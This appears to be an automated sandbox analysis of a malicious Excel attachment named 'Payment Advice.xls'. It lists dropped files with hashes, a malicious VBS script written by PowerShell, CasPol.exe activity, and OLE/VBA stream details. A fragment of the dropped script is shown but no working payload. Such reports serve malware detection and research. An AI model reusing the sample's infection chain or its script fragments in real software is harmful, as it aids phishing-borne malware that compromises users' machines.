                                                                                                    C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):46
                                                                                                    Entropy (8bit):1.0424600748477153
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:/lbWwWl:sZ
                                                                                                    MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                                                                                    SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                                                                                    SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                                                                                    SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                                                                                    Malicious:false
                                                                                                    Preview:........................................user.

                                                                                                    C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):140614
                                                                                                    Entropy (8bit):3.697292806385226
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:OSbtgt5p/GwRG5nFk0L0kTg/fGnuo9bz4H8k1:uKG/fGnuop0H1
                                                                                                    MD5:BF515F00DF29B4BE31AC6E43AB05CD88
                                                                                                    SHA1:29073164D5FDFD336C332321EBD8C01920438A8B
                                                                                                    SHA-256:50B9F7F3880E858AC733E7A7FB6B679E699C8BC9553948D04B2C15194B7520DC
                                                                                                    SHA-512:6EBB327DE4FD7DC7D348EC32C7D7CC9D79BD2753FAE2E29F7910E27D52091C6765E6EC6C0E982156661E9B80FE223C831CC739956624EF66262ADFFA1174ADA7
                                                                                                    Malicious:true
                                                                                                    Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .l.a.b.r.o.s.o.)..... . . . .d.i.m. .p.a.n.e.t.e.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .p.a.n.e.t.e..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .p.a.n.e.t.e.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.r.o.x.y.A.u.t.h.

                                                                                                    C:\Users\user\Desktop\A5330000

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 29 09:12:47 2024, Security: 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1072640
                                                                                                    Entropy (8bit):7.363316208520365
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:DmzHJEyfN1YpRBPx394ZEMD3DERnLRmF8DQ07yruEYSgK8bKDZ+PqbdEEW:Shfgp53RMbARM8V2qEdgw+qjW
                                                                                                    MD5:BCD0D6EB2D59E36AE1ACF1070D2CA6F9
                                                                                                    SHA1:562ADD4FDC8E1DBAE0242C8E5F47AB8FA80C8972
                                                                                                    SHA-256:065E02C9F4A276CED12FF1B5112F64ED21C99539DEA19E5C9B5FC57412C2F6E0
                                                                                                    SHA-512:ACD9207C1EB2B7506F675A2C2E3DF5874F93E704519D6AF981D1748F0A050903BF909418D5C131B53F27C2F194C46C95855C4BADB5D6ACC7A69F0D845061B21B
                                                                                                    Malicious:false
                                                                                                    Preview:......................>.......................................................................7...............................c.......e................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                    C:\Users\user\Desktop\A5330000:Zone.Identifier

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:false
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                    C:\Users\user\Desktop\Payment Advice.xls (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 29 09:12:47 2024, Security: 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1072640
                                                                                                    Entropy (8bit):7.363316208520365
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:DmzHJEyfN1YpRBPx394ZEMD3DERnLRmF8DQ07yruEYSgK8bKDZ+PqbdEEW:Shfgp53RMbARM8V2qEdgw+qjW
                                                                                                    MD5:BCD0D6EB2D59E36AE1ACF1070D2CA6F9
                                                                                                    SHA1:562ADD4FDC8E1DBAE0242C8E5F47AB8FA80C8972
                                                                                                    SHA-256:065E02C9F4A276CED12FF1B5112F64ED21C99539DEA19E5C9B5FC57412C2F6E0
                                                                                                    SHA-512:ACD9207C1EB2B7506F675A2C2E3DF5874F93E704519D6AF981D1748F0A050903BF909418D5C131B53F27C2F194C46C95855C4BADB5D6ACC7A69F0D845061B21B
                                                                                                    Malicious:true
                                                                                                    Preview:......................>.......................................................................7...............................c.......e................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 29 05:38:42 2024, Security: 1
                                                                                                    Entropy (8bit):7.34551078698693
                                                                                                    TrID:
                                                                                                    • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                    File name:Payment Advice.xls
                                                                                                    File size:1'080'832 bytes
                                                                                                    MD5:d6ad3108a8014d64c39ae1fe463112c5
                                                                                                    SHA1:f5bb7665aa11ad21d9fa117a6e7b270c533a5844
                                                                                                    SHA256:7b75ff23cf680717091181e61002f59e66a118302af798fc031548aead7a6af4
                                                                                                    SHA512:3bae03cb73bceae2e54255833d92cb2cf0a6e3b826997b4754909c103508b79734df24bd1e42161a292e30e83232569eecfb1d23d85856564a6b12dfc62b735f
                                                                                                    SSDEEP:12288:6mzHJEyfN1YVuBPT39LZEBD3DERnLRmF8DHFg6pvXlc857Jw6b4EJvQJwuXAw79r:9hfgVY3YBbARM8bF9pfW2GH5wa73N
                                                                                                    TLSH:1235AED3A9198F56ED520230A6F3876E6724CC83C522472F22F4772839FB794255AF8D
                                                                                                    File Content Preview:........................>.......................................................................7...............................c.......e......................................................................................................................

                                                                                                    File Icon

                                                                                                    Icon Hash:276ea3a6a6b7bfbf

                                                                                                    Static OLE Info

                                                                                                    General

                                                                                                    Document Type:OLE
                                                                                                    Number of OLE Files:1

                                                                                                    OLE File "Payment Advice.xls"

                                                                                                    Indicators
                                                                                                    Has Summary Info:
                                                                                                    Application Name:Microsoft Excel
                                                                                                    Encrypted Document:True
                                                                                                    Contains Word Document Stream:False
                                                                                                    Contains Workbook/Book Stream:True
                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                    Contains Visio Document Stream:False
                                                                                                    Contains ObjectPool Stream:False
                                                                                                    Flash Objects Count:0
                                                                                                    Contains VBA Macros:True
                                                                                                    Summary
                                                                                                    Code Page:1252
                                                                                                    Author:
                                                                                                    Last Saved By:
                                                                                                    Create Time:2006-09-16 00:00:00
                                                                                                    Last Saved Time:2024-10-29 05:38:42
                                                                                                    Creating Application:Microsoft Excel
                                                                                                    Security:1
                                                                                                    Document Summary
                                                                                                    Document Code Page:1252
                                                                                                    Thumbnail Scaling Desired:False
                                                                                                    Contains Dirty Links:False
                                                                                                    Shared Document:False
                                                                                                    Changed Hyperlinks:False
                                                                                                    Application Version:786432

                                                                                                    Streams with VBA

                                                                                                    VBA File Name: Sheet1.cls, Stream Size: 977
                                                                                                    General
                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                    VBA File Name:Sheet1.cls
                                                                                                    Stream Size:977
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . G . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 2d cd 04 47 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    VBA Code
                                                                                                    Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                    VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                                    General
                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                    VBA File Name:Sheet2.cls
                                                                                                    Stream Size:977
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . T . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 2d cd a5 54 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    VBA Code
                                                                                                    Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                    VBA File Name: Sheet3.cls, Stream Size: 977
                                                                                                    General
                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                    VBA File Name:Sheet3.cls
                                                                                                    Stream Size:977
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 2d cd 94 d8 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    VBA Code
                                                                                                    Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                    VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                                    General
                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                    VBA File Name:ThisWorkbook.cls
                                                                                                    Stream Size:985
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 2d cd d6 0e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    VBA Code
                                                                                                    Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                    Streams

                                                                                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                    General
                                                                                                    Stream Path:\x1CompObj
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:114
                                                                                                    Entropy:4.25248375192737
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                    General
                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:244
                                                                                                    Entropy:2.889430592781307
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                                    General
                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:200
                                                                                                    Entropy:3.2603503175049817
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . ] % ) . . . . . . . . .
                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                    Stream Path: MBD00CFD365/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/\x1CompObj
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:114
                                                                                                    Entropy:4.25248375192737
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Stream Path: MBD00CFD365/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/\x5DocumentSummaryInformation
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:244
                                                                                                    Entropy:2.701136490257069
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                    Stream Path: MBD00CFD365/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", Stream Size: 90976
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/\x5SummaryInformation
                                                                                                    CLSID:
                                                                                                    File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                                    Stream Size:90976
                                                                                                    Entropy:4.0202822243037755
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . % . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                    Stream Path: MBD00CFD365/MBD0002578E/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD0002578E/\x1CompObj
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:114
                                                                                                    Entropy:4.219515110876372
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Stream Path: MBD00CFD365/MBD0002578E/Package, File Type: Microsoft Excel 2007+, Stream Size: 33181
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD0002578E/Package
                                                                                                    CLSID:
                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                    Stream Size:33181
                                                                                                    Entropy:7.705040299215262
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:P K . . . . . . . . . . ! . ) ; . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
